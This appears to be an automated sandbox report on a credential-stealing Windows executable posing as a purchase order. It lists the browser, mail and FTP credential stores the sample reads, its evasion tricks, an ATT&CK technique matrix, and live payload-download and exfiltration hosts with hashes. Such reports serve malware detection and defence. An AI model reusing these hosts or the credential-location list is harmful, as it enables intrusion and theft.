            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597227Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596964Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596749Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596421Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596312Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596202Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595874Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595546Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595217Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595101Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594870Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594546Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594427Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594296Jump to behavior
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2965947526.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2965947526.0000000002AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeAPI call chain: ExitProcess graph end nodegraph_0-4275
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeAPI call chain: ExitProcess graph end nodegraph_0-4429
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_6E421B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E421B5F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess created: C:\Users\user\Desktop\PO 0309494059506060609696007.exe "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeQueries volume information: C:\Users\user\Desktop\PO 0309494059506060609696007.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PO 0309494059506060609696007.exe PID: 2128, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PO 0309494059506060609696007.exe PID: 2128, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PO 0309494059506060609696007.exe PID: 2128, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            226
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager311
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS141
            Virtualization/Sandbox Evasion
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PO 0309494059506060609696007.exe3%ReversingLabs
            PO 0309494059506060609696007.exe10%VirustotalBrowse
            PO 0309494059506060609696007.exe100%AviraHEUR/AGEN.1331786
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nst14AC.tmp\LangDLL.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://84.38.133.48/LSOzHkHtJlArws124.bin100%Avira URL Cloudmalware
            http://84.38.133.48/LSOzHkHtJlArws124.bin.#100%Avira URL Cloudmalware
            http://ftp.concaribe.com100%Avira URL Cloudmalware
            http://concaribe.com100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.12.205
            truefalse
              high
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    http://84.38.133.48/LSOzHkHtJlArws124.binfalse
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://84.38.133.48/LSOzHkHtJlArws124.bin.#PO 0309494059506060609696007.exe, 00000004.00000002.2965947526.0000000002AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://api.ipify.orgPO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://ftp.concaribe.comPO 0309494059506060609696007.exe, 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorPO 0309494059506060609696007.exefalse
                        high
                        http://concaribe.comPO 0309494059506060609696007.exe, 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://api.ipify.org/tPO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            84.38.133.48
                            unknownLatvia
                            203557DATACLUB-NLfalse
                            104.26.12.205
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            192.185.13.234
                            concaribe.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1577289
                            Start date and time:2024-12-18 11:05:28 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 49s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:PO 0309494059506060609696007.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/10@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 154
                            • Number of non-executed functions: 69
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            05:07:31API Interceptor633x Sleep call for process: PO 0309494059506060609696007.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            84.38.133.48Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.48/TeoRHdGgbvsSqoRyBIQpbDk31.bin
                            104.26.12.205jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/?format=text
                            xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                            • api.ipify.org/
                            GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                            • api.ipify.org/
                            8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                            • api.ipify.org/
                            Simple2.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                            • api.ipify.org/
                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                            • api.ipify.org/
                            perfcc.elfGet hashmaliciousXmrigBrowse
                            • api.ipify.org/
                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            api.ipify.orgHarrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            winws1.exeGet hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 104.26.13.205
                            rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                            • 104.26.13.205
                            https://www.canva.com/design/DAGZLdpMEGI/O58JBUDFuRvFcdZ0tgIwgA/edit?utm_content=DAGZLdpMEGI&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisherBrowse
                            • 104.26.12.205
                            https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 172.67.74.152
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            DATACLUB-NLPO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.133
                            ODjwCjQBAP.exeGet hashmaliciousGuLoaderBrowse
                            • 84.38.129.16
                            ODjwCjQBAP.exeGet hashmaliciousGuLoaderBrowse
                            • 84.38.129.16
                            Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.48
                            u9aPQQIwhj.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.42
                            Shipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.42
                            QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 84.38.133.160
                            Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 84.38.129.16
                            Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.129.16
                            PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 185.29.11.116
                            CLOUDFLARENETUSurS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                            • 172.64.41.3
                            https://2024sharepointonline.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                            • 104.16.20.118
                            https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                            • 1.1.1.1
                            EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                            • 104.18.86.42
                            ardware-v1.exeGet hashmaliciousLummaCBrowse
                            • 104.21.66.86
                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                            • 104.16.123.96
                            RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 172.67.177.134
                            ardware-v1.exeGet hashmaliciousLummaCBrowse
                            • 172.67.157.254
                            sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 172.65.251.78
                            UNIFIEDLAYER-AS-1USx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 166.63.22.4
                            https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                            • 108.167.188.184
                            KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 192.185.13.234
                            https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                            • 162.241.149.91
                            https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                            • 162.241.149.91
                            rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                            • 192.254.186.165
                            x86.elfGet hashmaliciousMiraiBrowse
                            • 192.163.243.124
                            https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                            • 192.185.150.180
                            1.elfGet hashmaliciousUnknownBrowse
                            • 74.91.233.206
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eurS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                            • 104.26.12.205
                            RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 104.26.12.205
                            x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                            • 104.26.12.205
                            sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.12.205
                            jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.12.205
                            Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.12.205
                            x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                            • 104.26.12.205
                            twjMb9cX64.exeGet hashmaliciousSliverBrowse
                            • 104.26.12.205
                            WOlxr4yjgF.exeGet hashmaliciousSliverBrowse
                            • 104.26.12.205
                            credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                            • 104.26.12.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nst14AC.tmp\LangDLL.dllkJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                              kJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                                B7zKt98iey.exeGet hashmaliciousUnknownBrowse
                                  B7zKt98iey.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                      file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                        http://mirror.cdex.mu/CDex-2.24.exeGet hashmaliciousUnknownBrowse
                                          http://mirror.cdex.mu/CDex-2.24.exeGet hashmaliciousUnknownBrowse
                                            ROM_Files_939964.exeGet hashmaliciousUnknownBrowse
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):3.818015063694808
                                              Encrypted:false
                                              SSDEEP:48:S46+/zTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mxofjLl:z5uPbOBtWZBV8jAWiAJCdv2CmAL
                                              MD5:AB1DB56369412FE8476FEFFFD11E4CC0
                                              SHA1:DAAD036A83B2EE2FA86D840A34A341100552E723
                                              SHA-256:6F14C8F01F50A30743DAC68C5AC813451463DFB427EB4E35FCDFE2410E1A913B
                                              SHA-512:8D886643B4FC24ADF78F76B663227D6E61863F89E0CBD49548F40DD040666CA94EA46BEC9E336850E4F300995D56E6DC85B689C8E09FF46758822D280F06B03D
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: kJs0JTLO6I.exe, Detection: malicious, Browse
                                              • Filename: kJs0JTLO6I.exe, Detection: malicious, Browse
                                              • Filename: B7zKt98iey.exe, Detection: malicious, Browse
                                              • Filename: B7zKt98iey.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              • Filename: ROM_Files_939964.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....~.\...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.719859767584478
                                              Encrypted:false
                                              SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                              MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                              SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                              SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                              SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Reputation:high, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1850292
                                              Entropy (8bit):0.15787706683171052
                                              Encrypted:false
                                              SSDEEP:768:OoaZJLqGy5Qo+RU46dPn7e4O7QkhE/EtrgCN85RaQ7EMB+6r26REcybaHpJkCCXx:yHV
                                              MD5:F1B19352186CB57567C88C002F5AF9BD
                                              SHA1:96BB06DBF3E930E8174E22C552E788BF62F8792E
                                              SHA-256:9B172DB9C04C16B1C75AA5EEDFA5500FB4650BC59282BBCB5BB2D983C4B00406
                                              SHA-512:AF16686666C2B9CB40C67D79DDA844550ECEA72CD2537F1CEAC0A944799409B5C157ACDA2700327998EAC3FD07A94CB6FA0A3708C24E24403844C092AA1A7AA2
                                              Malicious:false
                                              Reputation:low
                                              Preview:...............................................................................................................................................................`.....................................................................................................................................................................................................................................................................................................................!...........................................................................................................................................................................................................................................................................................m...............................................................................Y......................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):98946
                                              Entropy (8bit):2.6636248398837403
                                              Encrypted:false
